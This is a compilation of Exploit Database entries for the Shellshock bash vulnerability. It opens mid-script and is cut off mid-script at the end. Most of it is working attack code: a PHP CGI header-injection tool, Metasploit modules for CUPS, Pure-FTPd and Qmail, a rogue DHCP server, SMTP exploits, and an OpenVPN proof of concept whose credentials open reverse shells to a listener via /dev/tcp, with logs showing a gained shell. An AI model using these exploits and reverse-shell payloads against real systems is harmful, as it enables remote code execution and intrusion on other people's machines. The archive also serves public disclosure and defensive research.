thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
serversocket = socket(AF_INET, SOCK_STREAM)
addr = (rhost,int(rport))
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
buff = 1024
while True:
if args['payload'] == 'reverse':
clientsocket, clientaddr = serversocket.accept()
print "[!] Successfully exploited"
print "[!] Incoming connection from "+clientaddr[0]
stop = True
clientsocket.settimeout(3)
while True:
reply = raw_input(clientaddr[0]+"> ")
clientsocket.sendall(reply+"\n")
try:
data = clientsocket.recv(buff)
print data
except:
pass
if args['payload'] == 'bind':
try:
serversocket = socket(AF_INET, SOCK_STREAM)
time.sleep(1)
serversocket.connect(addr)
print "[!] Successfully exploited"
print "[!] Connected to "+rhost
stop = True
serversocket.settimeout(3)
while True:
reply = raw_input(rhost+"> ")
serversocket.sendall(reply+"\n")
data = serversocket.recv(buff)
print data
except:
pass
Exploit Database EDB-ID : 34766
Publication date : 2014-09-24 22h00 +00:00
Author : Prakhar Prasad & Subho Halder
EDB Verified : Yes
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
$req = file_get_contents($url, false, $context);
if(!$req && strpos($http_response_header[0],"500") > 0 )
die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
die("A connection error occurred!\n")
?>
Exploit Database EDB-ID : 35115
Publication date : 2014-10-28 23h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a post-auth code injection in specially crafted
environment variables in Bash, specifically targeting CUPS filters
through the PRINTER_INFO and PRINTER_LOCATION variables by default.
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'lcamtuf', # CVE-2014-6278
'Brendan Coles <bcoles[at]gmail.com>' # msf
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true
},
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash awk ruby'
},
# Tested:
# - CUPS version 1.4.3 on Ubuntu 10.04 (x86)
# - CUPS version 1.5.3 on Debian 7 (x64)
# - CUPS version 1.6.2 on Fedora 19 (x64)
# - CUPS version 1.7.2 on Ubuntu 14.04 (x64)
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014',
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(631),
OptBool.new('SSL', [ true, 'Use SSL', true ]),
OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
], self.class)
end
#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; $(#{cmd}) & }
end
#
# CVE-2014-6278
#
def cve_2014_6278(cmd)
%{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }}
end
#
# Check credentials
#
def check
@cookie = rand_text_alphanumeric(16)
printer_name = rand_text_alphanumeric(10 + rand(5))
res = add_printer(printer_name, '')
if !res
vprint_error("#{peer} - No response from host")
return Exploit::CheckCode::Unknown
elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/
vprint_status("#{peer} - Found CUPS version #{$1}")
else
print_status("#{peer} - Target is not a CUPS web server")
return Exploit::CheckCode::Safe
end
if res.body =~ /Set Default Options for #{printer_name}/
vprint_good("#{peer} - Added printer successfully")
delete_printer(printer_name)
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
vprint_error("#{peer} - Authentication failed")
elsif res.code == 426
vprint_error("#{peer} - SSL required - set SSL true")
end
Exploit::CheckCode::Detected
end
#
# Exploit
#
def exploit
@cookie = rand_text_alphanumeric(16)
printer_name = rand_text_alphanumeric(10 + rand(5))
# Select target CVE
case datastore['CVE']
when 'CVE-2014-6278'
cmd = cve_2014_6278(payload.raw)
else
cmd = cve_2014_6271(payload.raw)
end
# Add a printer containing the payload
# with a CUPS filter pointing to /bin/bash
res = add_printer(printer_name, cmd)
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
elsif res.body =~ /Set Default Options for #{printer_name}/
print_good("#{peer} - Added printer successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
else
fail_with(Failure::Unknown, "#{peer} - Could not add printer.")
end
# Add a test page to the print queue.
# The print job triggers execution of the bash filter
# which executes the payload in the environment variables.
res = print_test_page(printer_name)
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
elsif res.body =~ /Test page sent; job ID is/
vprint_good("#{peer} - Added test page to printer queue")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
elsif res.code == 426
fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
else
fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.")
end
# Delete the printer
res = delete_printer(printer_name)
if !res
fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
elsif res.body =~ /has been deleted successfully/
print_status("#{peer} - Deleted printer '#{printer_name}' successfully")
elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.")
elsif res.code == 426
vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
else
vprint_warning("#{peer} - Could not delete printer '#{printer_name}'")
end
end
#
# Add a printer to CUPS
#
def add_printer(printer_name, cmd)
vprint_status("#{peer} - Adding new printer '#{printer_name}'")
ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd"
ppd_file = <<-EOF
*PPD-Adobe: "4.3"
*%==== General Information Keywords ========================
*FormatVersion: "4.3"
*FileVersion: "1.00"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PCFileName: "#{ppd_name}"
*Manufacturer: "Brother"
*Product: "(Brother MFC-3820CN)"
*1284DeviceID: "MFG:Brother;MDL:MFC-3820CN"
*cupsVersion: 1.1
*cupsManualCopies: False
*cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash"
*cupsModelNumber: #{rand(10) + 1}
*ModelName: "Brother MFC-3820CN"
*ShortNickName: "Brother MFC-3820CN"
*NickName: "Brother MFC-3820CN CUPS v1.1"
*%
*%==== Basic Device Capabilities =============
*LanguageLevel: "3"
*ColorDevice: True
*DefaultColorSpace: RGB
*FileSystem: False
*Throughput: "12"
*LandscapeOrientation: Plus90
*VariablePaperSize: False
*TTRasterizer: Type42
*FreeVM: "1700000"
*DefaultOutputOrder: Reverse
*%==== Media Selection ======================
*OpenUI *PageSize/Media Size: PickOne
*OrderDependency: 18 AnySetup *PageSize
*DefaultPageSize: BrLetter
*PageSize BrA4/A4: "<</PageSize[595 842]/ImagingBBox null>>setpagedevice"
*PageSize BrLetter/Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice"
EOF
pd = Rex::MIME::Message.new
pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}"))
pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid"))
pd.add_part("add-printer", nil, nil, %(form-data; name="OP"))
pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME"))
pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable
pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable
pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI"))
data = pd.to_s
data.strip!
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'ctype' => "multipart/form-data; boundary=#{pd.bound}",
'data' => data,
'cookie' => "org.cups.sid=#{@cookie};",
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
)
end
#
# Queue a printer test page
#
def print_test_page(printer_name)
vprint_status("#{peer} - Adding test page to printer queue")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'printers', printer_name),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => "org.cups.sid=#{@cookie}",
'vars_post' => {
'org.cups.sid' => @cookie,
'OP' => 'print-test-page'
}
)
end
#
# Delete a printer
#
def delete_printer(printer_name)
vprint_status("#{peer} - Deleting printer '#{printer_name}'")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin'),
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'cookie' => "org.cups.sid=#{@cookie}",
'vars_post' => {
'org.cups.sid' => @cookie,
'OP' => 'delete-printer',
'printer_name' => printer_name,
'confirm' => 'Delete Printer'
}
)
end
end
Exploit Database EDB-ID : 34765
Publication date : 2014-09-24 22h00 +00:00
Author : Stephane Chazelas
EDB Verified : Yes
Exploit Database Note:
The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
Exploit Database EDB-ID : 34860
Publication date : 2014-10-01 22h00 +00:00
Author : @0x00string
EDB Verified : No
#!/usr/bin/python
# Exploit Title: dhclient shellshocker
# Google Dork: n/a
# Date: 10/1/14
# Exploit Author: @0x00string
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
# Version: 4.3.11
# Tested on: Ubuntu 14.04.1
# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187
# ______ ______ ______ _
# / __ | / __ |/ __ | _ (_)
#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___
#| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___)
#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |
# \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/
# (_____|
# _ _ _ _
# | | | | (_) _
# _ | | | _ ____| |_ ____ ____ | |_
# / || | || \ / ___) | |/ _ ) _ \| _)
#( (_| | | | ( (___| | ( (/ /| | | | |__
# \____|_| |_|\____)_|_|\____)_| |_|\___)
#
# _ _ _ _ _
# | | | | | | | | |
# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____
# /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___)
#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| |
#(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_|
# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts
# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out
# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.
# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.
import socket, struct
def HexToByte( hexStr ):
b = []
h = ''.join( h.split(" ") )
for i in range(0, len(h), 2):
b.append( chr( int (h[i:i+2], 16 ) ) )
return ''.join( b )
rport = 68
lport = 67
bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bsock.bind(("<broadcast>", lport))
while True:
OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114
URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex")
URLLEN = chr(len(URL) / 2).encode("hex")
END = "03040a000001ff"
broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)
hexip = broadcast_get[245:249]
rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3]))
XID = broadcast_get[4:8].encode("hex")
chaddr = broadcast_get[29:34].encode("hex")
print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n"
OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
OFFER_BYTES = HexToByte(OFFER)
ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END
ACK_BYTES = HexToByte(ACK)
print "[+]\tsending evil offer\n"
sock.sendto(OFFER_BYTES, (rhost, rport))
broadcast_get2 = bsock.recvfrom(2048)
print "[+]\tassuming request was received, sending ACK\n"
sock.sendto(ACK_BYTES, (rhost, rport))
Exploit Database EDB-ID : 34879
Publication date : 2014-10-03 22h00 +00:00
Author : hobbily plunt
EDB Verified : No
# Exploit Title: ShellShock OpenVPN Exploit
# Date: Fri Oct 3 15:48:08 EDT 2014
# Exploit Author: hobbily AKA @fj33r
# Version: 2.2.29
# Tested on: Debian Linux
# CVE : CVE-2014-6271
#Probably should of submitted this the day I tweeted it.
### server.conf
port 1194
proto udp
dev tun
client-cert-not-required
auth-user-pass-verify /etc/openvpn/user.sh via-env
tmp-dir "/etc/openvpn/tmp"
ca ca.crt
cert testing.crt
key testing.key # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
client-cert-not-required
plugin /usr/lib/openvpn/openvpn-auth-pam.so login
script-security 3
status openvpn-status.log
verb 3
### user.sh
#!/bin/bash
echo "$username"
echo "$password"
### start server
openvpn server.con
### terminal 1
nc -lp 4444
### terminal 2
sudo openvpn --client --remote 10.10.0.52 --auth-user-pass --dev tun --ca ca.cert --auth-nocache --comp-lzo
### username && password were both shellshocked just incase
user:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
pass:() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &
### log
Mon Sep 29 20:56:56 2014 NOTE: the current --script-security setting may allow this configuration to call user-defined scripts
Mon Sep 29 20:56:56 2014 PLUGIN_INIT: POST /usr/lib/openvpn/openvpn-auth-pam.so '[/usr/lib/openvpn/openvpn-auth-pam.so] [login]' intercepted=PLUGIN_AUTH_USER_PASS_VERIFY
Mon Sep 29 20:56:56 2014 Diffie-Hellman initialized with 1024 bit key
Mon Sep 29 20:56:56 2014 WARNING: POTENTIALLY DANGEROUS OPTION --client-cert-not-required may accept clients which do not present a certificate
Mon Sep 29 20:56:56 2014 TLS-Auth MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:56:56 2014 Socket Buffers: R=[163840->131072] S=[163840->131072]
Mon Sep 29 20:56:56 2014 ROUTE default_gateway=10.10.0.1
Mon Sep 29 20:56:56 2014 TUN/TAP device tun0 opened
Mon Sep 29 20:56:56 2014 TUN/TAP TX queue length set to 100
Mon Sep 29 20:56:56 2014 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
Mon Sep 29 20:56:56 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500
Mon Sep 29 20:56:56 2014 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2
Mon Sep 29 20:56:56 2014 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:56:56 2014 GID set to nogroup
Mon Sep 29 20:56:56 2014 UID set to nobody
Mon Sep 29 20:56:56 2014 UDPv4 link local (bound): [undef]
Mon Sep 29 20:56:56 2014 UDPv4 link remote: [undef]
Mon Sep 29 20:56:56 2014 MULTI: multi_init called, r=256 v=256
Mon Sep 29 20:56:56 2014 IFCONFIG POOL: base=10.8.0.4 size=62, ipv6=0
Mon Sep 29 20:56:56 2014 Initialization Sequence Completed
Mon Sep 29 20:57:54 2014 MULTI: multi_create_instance called
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Re-using SSL/TLS context
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 LZO compression initialized
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Control Channel MTU parms [ L:1542 D:138 EF:38 EB:0 ET:0 EL:0 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Data Channel MTU parms [ L:1542 D:1450 EF:42 EB:135 ET:0 EL:0 AF:3/1 ]
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Local Options hash (VER=V4): '530fdded'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 Expected Remote Options hash (VER=V4): '41690919'
Mon Sep 29 20:57:54 2014 10.10.0.56:1194 TLS: Initial packet from [AF_INET]10.10.0.56:1194, sid=644ea55a 5f832b02
AUTH-PAM: BACKGROUND: user '() { :;};/bin/bash -i >& /dev/tcp/10.10.0.56/4444 0>&1 &' failed to authenticate: Error in service module
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: POST /usr/lib/openvpn/openvpn-auth-pam.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 PLUGIN_CALL: plugin function PLUGIN_AUTH_USER_PASS_VERIFY failed with status 1: /usr/lib/openvpn/openvpn-auth-pam.so
_________/bin/bash_-i____/dev/tcp/10.10.0.56/4444_0__1__
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 TLS Auth Error: Auth Username/Password verification failed for peer
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 Control Channel: TLSv1, cipher TLSv1/SSLv3 DHE-RSA-AES256-SHA
Mon Sep 29 20:57:57 2014 10.10.0.56:1194 [] Peer Connection Initiated with [AF_INET]10.10.0.56:1194
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 PUSH: Received control message: 'PUSH_REQUEST'
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 Delayed exit in 5 seconds
Mon Sep 29 20:57:59 2014 10.10.0.56:1194 SENT CONTROL [UNDEF]: 'AUTH_FAILED' (status=1)
Mon Sep 29 20:58:01 2014 read UDPv4 [ECONNREFUSED]: Connection refused (code=111)
Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, client-instance exiting
### nc listener
nobody@debian:/etc/openvpn$ id
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
#shoutouts to Fredrik Str�mberg for the post he made on ycombinator
Exploit Database EDB-ID : 34896
Publication date : 2014-10-05 22h00 +00:00
Author : Phil Blank
EDB Verified : Yes
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
from socket import *
import sys
def usage():
print "shellshock_smtp.py <target> <command>"
argc = len(sys.argv)
if(argc < 3 or argc > 3):
usage()
sys.exit(0)
rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]
headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))
# banner grab
s.recv(2048*4)
def netFormat(d):
d += "\n"
return d.encode('hex').decode('hex')
data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)
data = netFormat("rcpt to:<nobody>")
s.send(data)
s.recv(2048*4)
data = netFormat("data")
s.send(data)
s.recv(2048*4)
data = ''
for h in headers:
data += netFormat(h + ":() { :; };" + cmd)
data += netFormat(cmd)
# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')
s.send(data)
s.recv(2048*4)
data = netFormat("quit")
s.send(data)
s.recv(2048*4)
Exploit Database EDB-ID : 34862
Publication date : 2014-10-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
'Description' => %q(
This module exploits the code injection flaw known as shellshock which
leverages specially crafted environment variables in Bash. This exploit
specifically targets Pure-FTPd when configured to use an external
program for authentication.
),
'Author' =>
[
'Stephane Chazelas', # Vulnerability discovery
'Frank Denis', # Discovery of Pure-FTPd attack vector
'Spencer McIntyre' # Metasploit module
],
'References' =>
[
['CVE', '2014-6271'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
],
'Payload' =>
{
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => :printf
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => :printf
}
]
],
'DefaultOptions' =>
{
'PrependFork' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'))
register_options(
[
Opt::RPORT(21),
OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end
def check
# this check method tries to use the vulnerability to bypass the login
username = rand_text_alphanumeric(rand(20) + 1)
random_id = (rand(100) + 1)
command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
if send_command(username, command) =~ /^2\d\d ok./i
return CheckCode::Safe if banner !~ /pure-ftpd/i
disconnect
command = "echo auth_ok:0; echo end"
if send_command(username, command) =~ /^5\d\d login authentication failed/i
return CheckCode::Vulnerable
end
end
disconnect
CheckCode::Safe
end
def execute_command(cmd, _opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
username = rand_text_alphanumeric(rand(20) + 1)
send_command(username, cmd)
end
def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
end
execute_cmdstager(linemax: 500)
handler
end
def send_command(username, cmd)
cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
connect
send_user(username)
password_result = send_pass(cmd)
disconnect
password_result
end
end
Exploit Database EDB-ID : 42938
Publication date : 2017-10-01 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Smtp
def initialize(info={})
super(update_info(info,
'Name' => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
'Description' => %q{
This module exploits a shellshock vulnerability on Qmail, a public
domain MTA written in C that runs on Unix systems.
Due to the lack of validation on the MAIL FROM field, it is possible to
execute shell code on a system with a vulnerable BASH (Shellshock).
This flaw works on the latest Qmail versions (qmail-1.03 and
netqmail-1.06).
However, in order to execute code, /bin/sh has to be linked to bash
(usually default configuration) and a valid recipient must be set on the
RCPT TO field (usually
[email protected]).
The exploit does not work on the "qmailrocks" community version
as it ensures the MAILFROM field is well-formed.
},
'Author' =>
[
'Mario Ledo (Metasploit module)',
'Gabriel Follon (Metasploit module)',
'Kyle George (Vulnerability discovery)'
],
'License' => MSF_LICENSE,
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'References' =>
[
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
['URL', 'https://lists.gt.net/qmail/users/138578']
],
'Payload' =>
{
'BadChars' => "\x3e",
'Space' => 888,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet perl ruby python'
# telnet ruby python and perl works only if installed on target
}
},
'Targets' => [ [ 'Automatic', { }] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 24 2014'
))
deregister_options('MAILFROM')
end
def smtp_send(data = nil)
begin
result = ''
code = 0
sock.put("#{data}")
result = sock.get_once
result.chomp! if (result)
code = result[0..2].to_i if result
return result, code
rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
return result, 0
rescue ::Exception => e
print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
return nil, 0
end
end
def exploit
to = datastore['MAILTO']
connect
result = smtp_send("HELO localhost\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status('Sending the payload...')
result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
print_status("Sending RCPT TO #{to}")
result = smtp_send("rcpt to:<#{to}>\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n")
if result[1] < 200 || result[1] > 354
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
if result[1] < 200 || result[1] > 300
fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
end
disconnect
end
end
Exploit Database EDB-ID : 48651
Publication date : 2020-07-07 22h00 +00:00
Author : 1F98D
EDB Verified : No
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
